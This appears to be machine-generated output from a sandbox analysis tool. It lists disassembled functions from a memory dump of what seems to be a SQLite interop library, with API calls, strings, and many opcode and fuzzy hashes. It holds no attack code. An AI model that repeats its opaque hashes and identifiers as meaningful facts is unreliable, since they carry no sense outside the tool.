                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: DebugOutputString$HandleModule$AddressErrorLastProc__snprintf_memset
                                                                                                                                                                                                                                      • String ID: <unknown>$CLR creation not implemented.$CLRCreateInstance$CorBindToRuntimeEx failure.$CorBindToRuntimeEx success.$CoreCLR$GetCLRRuntimeHost$ICLRRuntimeHost query success.$ICLRRuntimeHost2 start failure.$ICLRRuntimeHost2 start success.$ICLRRuntimeInfo loadable failure.$ICLRRuntimeInfo not loadable.$MSCorEE$could not create ICLRMetaHost.$could not get ICLRRuntimeHost.$could not get ICLRRuntimeHost2.$could not get ICLRRuntimeInfo.$detected .NET Core in process.$eeeSdk1: %s HRESULT 0x%016X$missing CLR function.$missing CLR module in process.$missing CoreCLR function.$v4.0.30319
                                                                                                                                                                                                                                      • API String ID: 2196009414-3302285550
                                                                                                                                                                                                                                      • Opcode ID: 251d093005941b39bfe04c54c0089e86e26bbd902196c31e195f11889d2e9d94
                                                                                                                                                                                                                                      • Instruction ID: 2abf859efbd8b8f2e94f950522f8f09ce966cb76c1ee171fa31529d871609839
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 251d093005941b39bfe04c54c0089e86e26bbd902196c31e195f11889d2e9d94
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F071D871C105599FD720EFA8CCC099DB3B8BB89320F0545A8E558EB201DA39DE4ACF61
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SIffb8076c269e2a85.SQLITE.INTEROP(?), ref: 6BCC6A43
                                                                                                                                                                                                                                      • SI8b0d9e6837e61abc.SQLITE.INTEROP(00000000), ref: 6BCC6A5A
                                                                                                                                                                                                                                      • SIffb8076c269e2a85.SQLITE.INTEROP(?), ref: 6BCC6A70
                                                                                                                                                                                                                                      • SI8b0d9e6837e61abc.SQLITE.INTEROP(?), ref: 6BCC6A80
                                                                                                                                                                                                                                      • CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,?), ref: 6BCC6AAF
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00008004,00000000,00000000,?), ref: 6BCC6AB9
                                                                                                                                                                                                                                      • SIdb45e174afb28e2c.SQLITE.INTEROP(CryptEncrypt failed, code=%lu,00000000,?,?,?,00000000,?), ref: 6BCC6AC5
                                                                                                                                                                                                                                      • SI905dcc543d48caab.SQLITE.INTEROP(?,00000000,000000FF,CryptEncrypt failed, code=%lu,00000000,?,?,?,00000000,?), ref: 6BCC6AD3
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000,?,?,?,?,?,00000000,?), ref: 6BCC6BFB
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000,?,?,?,?,?,?,00000000,?), ref: 6BCC6C04
                                                                                                                                                                                                                                      • CryptDestroyKey.ADVAPI32(?,?,?,?,?,?,?,?,00000000,?), ref: 6BCC6C15
                                                                                                                                                                                                                                      • CryptDestroyHash.ADVAPI32(?,?,?,?,?,?,?,?,00000000,?), ref: 6BCC6C24
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • CryptCreateHash failed, code=%lu, xrefs: 6BCC6AC0
                                                                                                                                                                                                                                      • CryptDecrypt failed, code=%lu, xrefs: 6BCC6BDA
                                                                                                                                                                                                                                      • CryptHashData failed, code=%lu, xrefs: 6BCC6B02
                                                                                                                                                                                                                                      • CryptDeriveKey failed, code=%lu, xrefs: 6BCC6B4B
                                                                                                                                                                                                                                      • CryptEncrypt failed, code=%lu, xrefs: 6BCC6BB6
                                                                                                                                                                                                                                      • missing encryption context, xrefs: 6BCC69F7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Crypt$DestroyHashI8b0d9e6837e61abc.Iaa0f8e0c251cfd1d.Iffb8076c269e2a85.$CreateErrorI905dcc543d48caab.Idb45e174afb28e2c.Last
                                                                                                                                                                                                                                      • String ID: CryptCreateHash failed, code=%lu$CryptDecrypt failed, code=%lu$CryptDeriveKey failed, code=%lu$CryptEncrypt failed, code=%lu$CryptHashData failed, code=%lu$missing encryption context
                                                                                                                                                                                                                                      • API String ID: 3483430705-1659892492
                                                                                                                                                                                                                                      • Opcode ID: 69e6bf696a031a202070ce252fd7dcb42ae3c1c076e530a3d7148d16f68e0908
                                                                                                                                                                                                                                      • Instruction ID: ce8cc46ee3b0c37223c6be7d3bc0cc43d98cdf1d2886b71a3b1fba5ea5d6320f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 69e6bf696a031a202070ce252fd7dcb42ae3c1c076e530a3d7148d16f68e0908
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6A6115B1614200AFE700CF64DD45F6B77A8EF85718F108669F9599B280FB39EB0587A3
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 6BCC6CF1
                                                                                                                                                                                                                                      • SI5b914c29cf5a7984.SQLITE.INTEROP(?), ref: 6BCC6D2D
                                                                                                                                                                                                                                      • SI905dcc543d48caab.SQLITE.INTEROP(?,SHA3 size should be one of: 224 256 384 512,000000FF), ref: 6BCC6D5D
                                                                                                                                                                                                                                      • SIa364946505687432.SQLITE.INTEROP(?), ref: 6BCC6E20
                                                                                                                                                                                                                                      • SI25d73a5ab4d6cacb.SQLITE.INTEROP(?,00000000), ref: 6BCC6E52
                                                                                                                                                                                                                                      • SI30455e90830ca460.SQLITE.INTEROP(?,00000000), ref: 6BCC6E8F
                                                                                                                                                                                                                                      • SI558bdfe0e27562ea.SQLITE.INTEROP(?,00000000,00000009,?,00000000), ref: 6BCC6F21
                                                                                                                                                                                                                                      • SI25ca8d2baaee0750.SQLITE.INTEROP(?,00000000,00000009,?,00000000,00000009,?,00000000), ref: 6BCC6FBC
                                                                                                                                                                                                                                      • SI25ca8d2baaee0750.SQLITE.INTEROP(?,00000000,?,?,?,?,?,?,?,00000009,?,00000000,00000009,?,00000000), ref: 6BCC6FD4
                                                                                                                                                                                                                                      • SI8259474343588db4.SQLITE.INTEROP(?,00000000,?,00000000,?,?,?,?,?,?,?,00000009,?,00000000,00000009,?), ref: 6BCC6FDD
                                                                                                                                                                                                                                      • SIa364946505687432.SQLITE.INTEROP(?), ref: 6BCC7014
                                                                                                                                                                                                                                      • SIdb45e174afb28e2c.SQLITE.INTEROP(error SQL statement [%s]: %s,?,00000000), ref: 6BCC7091
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000), ref: 6BCC70C3
                                                                                                                                                                                                                                      • SIdb45e174afb28e2c.SQLITE.INTEROP(non-query: [%s],?), ref: 6BCC70EC
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000), ref: 6BCC7117
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I25ca8d2baaee0750.Ia364946505687432.Iaa0f8e0c251cfd1d.Idb45e174afb28e2c.$I25d73a5ab4d6cacb.I30455e90830ca460.I558bdfe0e27562ea.I5b914c29cf5a7984.I8259474343588db4.I905dcc543d48caab._memset
                                                                                                                                                                                                                                      • String ID: B%d:$F$I$S%d:$SHA3 size should be one of: 224 256 384 512$T%d:$error SQL statement [%s]: %s$non-query: [%s]
                                                                                                                                                                                                                                      • API String ID: 2385748821-2082158347
                                                                                                                                                                                                                                      • Opcode ID: b0c328780f35f54028d571ec461cce38a239c47746de652289fcb59e44aa276e
                                                                                                                                                                                                                                      • Instruction ID: a317266532bbbfd4ee43209d023800c2ca1f880e2942fe377cc06758f4129aa5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b0c328780f35f54028d571ec461cce38a239c47746de652289fcb59e44aa276e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4DD145719196409BD7108B38CC42B9FB7E5EFD5318F044A69E89897382EB3D9619C3E3
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BBD622E: EncodePointer.KERNEL32(00000000,6BBDF793,6BD19A58,00000314,00000000,?,?,?,?,?,6BBDDA8F,6BD19A58,Microsoft Visual C++ Runtime Library,00012010), ref: 6BBD6230
                                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(USER32.DLL,6BD19A58,00000314,00000000), ref: 6BBDF7A8
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 6BBDF7C4
                                                                                                                                                                                                                                      • EncodePointer.KERNEL32(00000000), ref: 6BBDF7D5
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 6BBDF7E2
                                                                                                                                                                                                                                      • EncodePointer.KERNEL32(00000000), ref: 6BBDF7E5
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 6BBDF7F2
                                                                                                                                                                                                                                      • EncodePointer.KERNEL32(00000000), ref: 6BBDF7F5
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 6BBDF802
                                                                                                                                                                                                                                      • EncodePointer.KERNEL32(00000000), ref: 6BBDF805
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 6BBDF816
                                                                                                                                                                                                                                      • EncodePointer.KERNEL32(00000000), ref: 6BBDF819
                                                                                                                                                                                                                                      • DecodePointer.KERNEL32(00000000,6BD19A58,00000314,00000000), ref: 6BBDF83B
                                                                                                                                                                                                                                      • DecodePointer.KERNEL32 ref: 6BBDF845
                                                                                                                                                                                                                                      • DecodePointer.KERNEL32(?,6BD19A58,00000314,00000000), ref: 6BBDF884
                                                                                                                                                                                                                                      • DecodePointer.KERNEL32(?), ref: 6BBDF89E
                                                                                                                                                                                                                                      • DecodePointer.KERNEL32(6BD19A58,00000314,00000000), ref: 6BBDF8B2
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Pointer$Encode$AddressDecodeProc$LibraryLoad
                                                                                                                                                                                                                                      • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
                                                                                                                                                                                                                                      • API String ID: 1951731885-564504941
                                                                                                                                                                                                                                      • Opcode ID: 2d7acfe58887e7e9ccf38472916eda7938aafdcdb192a1e3d264b59d6380061a
                                                                                                                                                                                                                                      • Instruction ID: a2b3c498b46c6b628a311a71f9f97480a4494377702ceac230d73603b5fc88a0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d7acfe58887e7e9ccf38472916eda7938aafdcdb192a1e3d264b59d6380061a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B411975E0424AEBEF019BB5CC45A6FBBACEF49350B400476E518E7140DB3ED506CBA1
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: B%d:$F$I$S%d:$T%d:$error SQL statement [%s]: %s$non-query: [%s]
                                                                                                                                                                                                                                      • API String ID: 0-488465397
                                                                                                                                                                                                                                      • Opcode ID: ceea2e38b88115b4cef03b247639e1e13afb2787debc3e35348082222b3be8b4
                                                                                                                                                                                                                                      • Instruction ID: 1705454db8df1c86a43364a574594293f553e7582dacf9ba201aa6a7fc71ddf5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ceea2e38b88115b4cef03b247639e1e13afb2787debc3e35348082222b3be8b4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B3B1E2B15193409BD710DF388842B9FBBA4EFD6318F54496DF48897241EB389A09C7A3
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 6BCCF97D
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000), ref: 6BCCF98A
                                                                                                                                                                                                                                      • CryptAcquireContextW.ADVAPI32(?,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000), ref: 6BCCF9B6
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 6BCCF9C0
                                                                                                                                                                                                                                      • SIdb45e174afb28e2c.SQLITE.INTEROP(CryptAcquireContext failed, code=%lu,00000000), ref: 6BCCF9CC
                                                                                                                                                                                                                                        • Part of subcall function 6BCC5630: _memset.LIBCMT ref: 6BCC5737
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 6BCCF9A6
                                                                                                                                                                                                                                      • cryptoapi_decrypt, xrefs: 6BCCFA1A
                                                                                                                                                                                                                                      • CryptAcquireContext failed, code=%lu, xrefs: 6BCCF9C7
                                                                                                                                                                                                                                      • cryptoapi_encrypt, xrefs: 6BCCFA4A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ContextCrypt$AcquireErrorIaa0f8e0c251cfd1d.Idb45e174afb28e2c.LastRelease_memset
                                                                                                                                                                                                                                      • String ID: CryptAcquireContext failed, code=%lu$Microsoft Enhanced Cryptographic Provider v1.0$cryptoapi_decrypt$cryptoapi_encrypt
                                                                                                                                                                                                                                      • API String ID: 1962234622-3603160501
                                                                                                                                                                                                                                      • Opcode ID: 23214cdc66911b1adc75e33810ef0b0f8b08d551082ac389c14138adaf2179ae
                                                                                                                                                                                                                                      • Instruction ID: 22c9e2407e6e2254bbfbbb8b175d25211b5c70baa84815300f597d5dc4cbd0c8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 23214cdc66911b1adc75e33810ef0b0f8b08d551082ac389c14138adaf2179ae
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B331E772A613107BE7209F759C06F5B77D89F50718F108029FA58DB280FB79E74483A6
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,000152F8,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC5383E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$($database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
                                                                                                                                                                                                                                      • API String ID: 2981141233-1483524669
                                                                                                                                                                                                                                      • Opcode ID: 6cd96235e975ea8402108662bbe59fa02e904b7eafd4272fde669a1a4a05b720
                                                                                                                                                                                                                                      • Instruction ID: b9aefc6812c4f1b235a02ca485ec7ac4a5bbb39e9614314e32e6a91a9168d48a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6cd96235e975ea8402108662bbe59fa02e904b7eafd4272fde669a1a4a05b720
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3402F372A282418FC320CF68C49066ABBF1FBC1350F14499EE8D78B251E739EA74CB55
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC14043
                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BC140E7
                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BC14101
                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BC141D8
                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BC141F2
                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BC1420B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$Iaa0f8e0c251cfd1d.
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2940838516-0
                                                                                                                                                                                                                                      • Opcode ID: 45a0789ca1caecee34eb0f3460aa74ceb5a4ef6e684e0b1ce7a7ad41d5cad3bf
                                                                                                                                                                                                                                      • Instruction ID: 7a3983cd1bbcd7173671c5106c6bac4865cf81ffddc07390bdb1c4f017148f61
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 45a0789ca1caecee34eb0f3460aa74ceb5a4ef6e684e0b1ce7a7ad41d5cad3bf
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1E816F71A15B059FE718CF3AC8816DAB7EAEF95308F14C56DE869DB210F73596019B00
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 6BBD34F1
                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6BBD3506
                                                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(6BCEF374), ref: 6BBD3511
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 6BBD352D
                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 6BBD3534
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2579439406-0
                                                                                                                                                                                                                                      • Opcode ID: ba9b2547d81174fee3b296841f9f265e7132052eb0472f2ab789225dfe076a56
                                                                                                                                                                                                                                      • Instruction ID: fddc0ef7a195bae4635eb2e1a43891b11733c8bbd66ed44b60cbf0903fcab6a6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ba9b2547d81174fee3b296841f9f265e7132052eb0472f2ab789225dfe076a56
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5821CFB890024ADFFF00CFA4D186684BBB4BB4A715F90501AE509AB342E77CD683CF19
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
